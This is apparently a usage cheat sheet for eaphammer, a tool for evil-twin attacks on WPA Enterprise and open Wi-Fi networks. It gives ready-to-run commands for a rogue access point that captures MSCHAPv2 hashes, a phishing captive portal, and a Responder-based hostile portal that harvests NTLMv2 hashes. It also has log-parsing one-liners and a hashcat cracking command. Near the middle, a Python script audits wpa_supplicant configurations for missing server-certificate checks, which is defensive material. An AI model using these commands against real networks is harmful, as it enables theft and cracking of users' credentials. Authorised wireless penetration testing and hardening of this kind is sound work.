Overview
eaphammer automates evil twin attacks against WPA Enterprise networks. It handles certificate generation, rogue AP setup, and credential capture. It also supports open network attacks via captive portals, and hostile portals for NTLMv2 hash capture.
Install
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
pip3 install -r requirements.txt
Usage
python3 eaphammer [options]
Common Flags
| Flag | Description |
|---|---|
| `-i <iface>` | Wireless interface |
| `--essid <SSID>` | Target SSID to impersonate |
| `--auth wpa-eap` | WPA Enterprise authentication |
| `--creds` | Capture credentials |
| `--negotiate balanced` | Try multiple EAP methods |
| `--cert-wizard` | Interactive certificate generator |
| `--captive-portal` | Launch phishing captive portal |
| `--hostile-portal` | Launch Responder-based hostile portal |
Generate Certificate
python3 ./eaphammer --cert-wizard
Import existing CA and server cert (for cloned cert attack):
python3 ./eaphammer --cert-wizard import \
--server-cert /path/to/server.crt \
--ca-cert /path/to/ca.crt \
--private-key /path/to/server.key \
--private-key-passwd whatever
WPA Enterprise Rogue AP
Captures MSCHAPv2 hashes from clients that don’t validate the server certificate:
python3 ./eaphammer -i wlan1 \
--auth wpa-eap \
--essid <TARGET-SSID> \
--creds \
--negotiate balanced
Extract hashes from log:
cat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500
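The rogue AP above only yields hashes from clients that don't validate the server certificate, so the matching check is on the supplicant side. The following is an added example, not part of eaphammer or the original page: it audits a wpa_supplicant.conf for WPA-EAP network blocks that lack `ca_cert` or a server name constraint. The function name `audit`, the sample SSIDs and the file paths are assumptions made for illustration, and the embedded configuration is constructed.

```python
import re

# Constructed sample wpa_supplicant.conf content (not from the original page).
SAMPLE_CONF = '''
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="CorpWiFi-Pinned"
    key_mgmt=WPA-EAP
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
}
network={
    ssid="CorpWiFi-CAOnly"
    key_mgmt=WPA-EAP
    ca_cert="/etc/ssl/certs/corp-ca.pem"
}
network={
    ssid="HomePSK"
    key_mgmt=WPA-PSK
}
'''

# wpa_supplicant options that constrain which server certificate is accepted.
NAME_CHECKS = ("domain_suffix_match", "domain_match", "altsubject_match", "subject_match")

def audit(conf_text):
    """Return {ssid: finding} for every network block whose key_mgmt uses EAP."""
    findings = {}
    for block in re.findall(r"network=\{(.*?)\n\}", conf_text, re.S):
        opts = dict(re.findall(r"^\s*(\w+)=(.*?)\s*$", block, re.M))
        if "EAP" not in opts.get("key_mgmt", ""):  # skip PSK/open networks
            continue
        ssid = opts.get("ssid", "?").strip('"')
        if "ca_cert" not in opts:
            findings[ssid] = "no ca_cert: server certificate is not validated"
        elif not any(k in opts for k in NAME_CHECKS):
            findings[ssid] = "ca_cert set but no server name check"
        else:
            findings[ssid] = "ok"
    return findings

if __name__ == "__main__":
    for ssid, finding in audit(SAMPLE_CONF).items():
        print(f"{ssid}: {finding}")
```

A block with `ca_cert` but no name constraint accepts any server certificate issued by that CA, which is why it is reported separately from the fully pinned case.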
Captive Portal Attack
Phishes credentials from clients connecting to an open network:
sudo killall dnsmasq
python3 ./eaphammer --essid <OPEN-SSID> --interface wlan1 --captive-portal
Hostile Portal Attack
Serves a hostile portal that triggers automatic Windows NTLM authentication:
sudo killall dnsmasq
python3 ./eaphammer --essid <TARGET-SSID> --interface wlan1 --hostile-portal
Crack the captured NTLMv2 hash:
cat logs/Responder-Session.log | grep NTLMv2 | grep Hash | awk '{print $9}' > responder.5600
hashcat -a 0 -m 5600 responder.5600 ~/rockyou.txt --force